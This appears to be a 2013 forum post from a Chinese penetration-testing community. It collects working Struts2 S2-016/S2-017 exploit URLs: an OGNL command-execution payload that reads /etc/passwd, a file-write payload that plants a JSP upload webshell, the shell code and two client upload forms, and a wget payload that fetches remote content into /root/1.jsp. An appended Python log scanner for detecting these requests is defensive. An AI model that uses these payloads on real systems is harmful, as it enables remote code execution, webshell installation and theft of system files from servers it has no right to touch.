China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: Struts2 S2-016/S2-017 vulnerability code execution

Author: admin    Time: 2013-7-18 23:03
Everyone has already posted these, so I just tidied them up. Friendly reminder: your own life is worth more than a shell.

If you like it, click thanks ^_^

Command execution with echoed output:

http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

Path disclosure:

http://www.example.com/struts2-b ... 8%29.close%28%29%7D

Write a file:
6 [8 X( t5 l. J( g" C. o
http://www.example.com/struts2-blank/example/X.action?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e

Content of the written file:

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

It is really just a small JSP shell; it needs a client side to go with it.

The parameter f is the file name, t is the content.

Client:

<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
<textarea name=t cols=120 rows=10>your code</textarea>
<center>
<input type=submit value="提交">
</center>
</form>

This creates an fjp.jsp in the current directory.

shell: http://www.example.com/struts2-blank/example/fjp.jsp

There is also a client from @园长:

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>jsp-园长</title>
<style>
.main{width:980px;height:600px;margin:0 auto;}
.url{width:300px;}
.fn{width:60px;}
.content{width:80%;height:60%;}
</style>
<script>
  // Validate the three fields, then point the form at the chosen URL and submit it.
  function upload(){
    var url = document.getElementById('url').value,
      content = document.getElementById('content').value,
      fileName = document.getElementById('fn').value,
      form = document.getElementById('fm');
    if(url.length == 0){
      alert("Url must not be empty!");
      return;
    }
    if(content.length == 0){
      alert("Content must not be empty!");
      return;
    }
    if(fileName.length == 0){
      alert("FileName must not be empty!");
      return;
    }
    form.action = url;
    form.submit();
  }
</script>
</head>
<body>
<div class="main">
  <form id="fm" method="post">
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
    <a href="javascript:upload();">Upload</a>
    <textarea id="content" class="content" name="t" ></textarea>
  </form>
</div>
</body>
</html>

And a wget getshell posted by @X:

?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
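As an added example, not code from the post or from the people it credits, here is a defender-side Python scanner for the two request shapes shown above: the `redirect:${...}` echoed-command request and the file-writing variant that reaches `getRealPath`/`FileWriter`. It runs over constructed access-log lines; the IP addresses, timestamps and paths in them are made up.

```python
"""Flag S2-016-style OGNL injection (redirect:${...}) in access log lines.
Added example, not from the original post; log lines are constructed."""
import re
from urllib.parse import unquote

# Combined/common log format: only the request target matters here.
_LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Tokens seen when OGNL runs server-side: process spawn, file write,
# direct access to the servlet request/response objects.
_OGNL_MARKERS = ("#context", "#_memberAccess", "ProcessBuilder", "getRuntime",
                 "getRealPath", "FileWriter", "getWriter")

def analyse_target(target: str) -> dict:
    """Classify one request target (path + query string)."""
    decoded = unquote(unquote(target))  # payloads are often double-encoded
    findings = {"dmi_prefix": False, "ognl_expr": False, "markers": []}
    # A redirect:/redirectAction:/action: parameter means prefix-style
    # dynamic method invocation reaches the app; S2-016 depends on it.
    if re.search(r"[?&](redirect|redirectAction|action):", decoded):
        findings["dmi_prefix"] = True
        # ${...} or %{...} right after the prefix is an OGNL expression.
        if re.search(r"(redirect|redirectAction|action):[$%]\{", decoded):
            findings["ognl_expr"] = True
    findings["markers"] = [m for m in _OGNL_MARKERS if m in decoded]
    return findings

def scan_log(lines):
    """Return [(line_no, severity, findings)] for suspicious log lines."""
    hits = []
    for no, line in enumerate(lines, 1):
        match = _LOG_RE.search(line)
        if not match:
            continue
        found = analyse_target(match.group("target"))
        if found["ognl_expr"] or found["markers"]:
            hits.append((no, "high", found))
        elif found["dmi_prefix"]:
            hits.append((no, "medium", found))
    return hits

# Constructed sample log: benign traffic, a bare prefix, a payload shaped like
# the page's file-write request, and a harmless "redirect=" parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jul/2013:23:03:01 +0800] "GET /struts2-blank/example/HelloWorld.action HTTP/1.1" 200 512',
    '10.0.0.5 - - [18/Jul/2013:23:03:02 +0800] "GET /struts2-blank/example/X.action?redirect:/index.action HTTP/1.1" 302 0',
    '10.0.0.9 - - [18/Jul/2013:23:03:03 +0800] "GET /struts2-blank/example/X.action?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27),%23req.getRealPath(%22/%22)} HTTP/1.1" 200 1024',
    '10.0.0.5 - - [18/Jul/2013:23:03:04 +0800] "GET /struts2-blank/example/login.action?redirect=/home HTTP/1.1" 200 300',
]
```

A bare prefix hit (medium) is worth alerting on by itself, because the Struts fix for S2-016 was to stop honouring these prefixes at all; a high hit means an OGNL expression or a server-side marker reached the application.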




Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2